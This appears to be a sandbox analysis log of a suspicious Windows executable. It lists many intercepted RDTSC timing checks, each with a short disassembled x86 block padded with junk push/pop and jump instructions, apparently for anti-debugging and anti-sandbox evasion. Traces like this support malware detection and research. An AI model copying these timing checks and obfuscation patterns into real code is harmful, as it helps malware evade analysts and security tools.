Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F9317 second address: 11F935E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F3FACCA44B8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D235Ch], edx 0x00000028 push esi 0x00000029 mov ebx, dword ptr [ebp+1246807Fh] 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1A4Bh], ebx 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F935E second address: 11F936D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3FAC813906h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FC14F second address: 11FC175 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3FACCA44B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c mov di, cx 0x0000000f push 00000000h 0x00000011 xor ebx, 1EFE2AADh 0x00000017 push 00000000h 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e pop eax 0x0000001f jnp 00007F3FACCA44B6h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FC175 second address: 11FC17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3FAC813906h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FB3F7 second address: 11FB3FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FD2CD second address: 11FD2FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC813912h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F3FAC81390Dh 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE30B second address: 11FE311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE311 second address: 11FE315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FD475 second address: 11FD479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE315 second address: 11FE38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jmp 00007F3FAC813917h 0x0000000f pop edi 0x00000010 nop 0x00000011 mov ebx, ecx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F3FAC813908h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f call 00007F3FAC813912h 0x00000034 mov bh, CAh 0x00000036 pop ebx 0x00000037 and bx, C56Ah 0x0000003c push 00000000h 0x0000003e cmc 0x0000003f or ebx, dword ptr [ebp+12474F6Bh] 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 jl 00007F3FAC813906h 0x0000004f pop edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE38F second address: 11FE399 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3FACCA44BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FD55F second address: 11FD57B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81390Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FD57B second address: 11FD580 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FF466 second address: 11FF46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12003AF second address: 12003B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12003B3 second address: 1200412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F3FAC81C958h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov bx, 8D11h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F3FAC81C958h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov edi, dword ptr [ebp+122D1CDEh] 0x0000004a push 00000000h 0x0000004c xchg eax, esi 0x0000004d push ecx 0x0000004e push edi 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1201432 second address: 1201437 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1201437 second address: 12014EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F3FAC81C958h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007F3FAC81C968h 0x00000029 push 00000000h 0x0000002b jmp 00007F3FAC81C969h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 pushad 0x00000034 mov bx, dx 0x00000037 call 00007F3FAC81C966h 0x0000003c pop eax 0x0000003d popad 0x0000003e pop edi 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 jmp 00007F3FAC81C965h 0x00000046 jmp 00007F3FAC81C969h 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push ecx 0x00000050 push ecx 0x00000051 pop ecx 0x00000052 pop ecx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12014EA second address: 12014EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12024CE second address: 12024D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE50C second address: 11FE510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE510 second address: 11FE516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FF687 second address: 11FF691 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FF691 second address: 11FF6A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C95Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE516 second address: 11FE51D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FF6A7 second address: 11FF6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11FE51D second address: 11FE5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007F3FACC550EDh 0x0000000e jc 00007F3FACC550E7h 0x00000014 jmp 00007F3FACC550E1h 0x00000019 nop 0x0000001a jmp 00007F3FACC550E4h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F3FACC550D8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 xor edi, dword ptr [ebp+122D2A91h] 0x00000046 sub dword ptr [ebp+122D294Bh], ebx 0x0000004c mov dword ptr fs:[00000000h], esp 0x00000053 mov dword ptr [ebp+122D1C61h], edx 0x00000059 push ecx 0x0000005a mov di, ax 0x0000005d pop ebx 0x0000005e mov eax, dword ptr [ebp+122D1425h] 0x00000064 mov dword ptr [ebp+1246803Bh], edi 0x0000006a push FFFFFFFFh 0x0000006c mov dword ptr [ebp+122D1884h], edx 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jnc 00007F3FACC550D8h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11ABF08 second address: 11ABF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11ABF0C second address: 11ABF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3FACC550DFh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F3FACC550E7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12026C9 second address: 12026E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3FAC81C969h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11ABF3E second address: 11ABF65 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3FACC550D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jp 00007F3FACC550DAh 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 ja 00007F3FACC550DCh 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12035FD second address: 1203601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205A23 second address: 1205A29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205A29 second address: 1205A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1205A2F second address: 1205A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1206CCC second address: 1206CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12107C2 second address: 12107D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DBh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120FF1D second address: 120FF22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120FF22 second address: 120FF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F3FACC550D8h 0x00000011 push edi 0x00000012 jno 00007F3FACC550D6h 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121037D second address: 1210383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1214D02 second address: 1214D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3FACC550D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1214D11 second address: 1214D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A9C1 second address: 121A9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A9C5 second address: 121A9CF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3FAC81C956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A9CF second address: 121A9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A9D5 second address: 121A9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F3FAC81C95Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A9E5 second address: 121A9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A382F second address: 11A3833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A3833 second address: 11A383D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A383D second address: 11A384D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F3FAC81C956h 0x0000000a jp 00007F3FAC81C956h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1219C40 second address: 1219C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1219DCF second address: 1219DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F3FAC81C956h 0x0000000a ja 00007F3FAC81C956h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1219F5C second address: 1219F62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1219F62 second address: 1219F7A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3FAC81C958h 0x00000008 jg 00007F3FAC81C958h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A1E4 second address: 121A1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A1E8 second address: 121A20A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F3FAC81C956h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A385 second address: 121A395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F3FACC550D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A395 second address: 121A3A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007F3FAC81C956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A3A1 second address: 121A3C3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3FACC550DEh 0x00000008 jo 00007F3FACC550D6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3FACC550DBh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A56B second address: 121A591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3FAC81C969h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jl 00007F3FAC81C956h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A591 second address: 121A59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jno 00007F3FACC550D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A882 second address: 121A886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121A886 second address: 121A88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121EC9F second address: 121ECB0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F3FAC81C956h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121ECB0 second address: 121ECBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FACC550DAh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121ECBF second address: 121ECFF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3FAC81C96Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F3FAC81C966h 0x0000000f push eax 0x00000010 jmp 00007F3FAC81C966h 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121ECFF second address: 121ED0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F3FACC550D6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121ED0E second address: 121ED1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F3FAC81C95Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121F916 second address: 121F91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121FBD1 second address: 121FBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121FEE0 second address: 121FEE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121FEE6 second address: 121FEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A53AA second address: 11A53B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A53B0 second address: 11A53CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FAC81C965h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A53CA second address: 11A53CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A53CF second address: 11A53D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A53D5 second address: 11A53DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EB5DD second address: 11EB5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EB96E second address: 11EB97D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EBB0A second address: 11EBB14 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FAC81C956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EBC30 second address: 11EBC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F3FACC550D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EBE10 second address: 11EBE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EBE15 second address: 11EBE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11EBF31 second address: 11EBF35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1223B17 second address: 1223B1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224079 second address: 122407D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122407D second address: 1224083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1224083 second address: 12240B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F3FAC81C967h 0x00000013 jmp 00007F3FAC81C95Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12240B6 second address: 12240C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F3FACC550D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12240C0 second address: 12240C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12277F1 second address: 12277FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3FACC550D6h 0x0000000a rdtsc
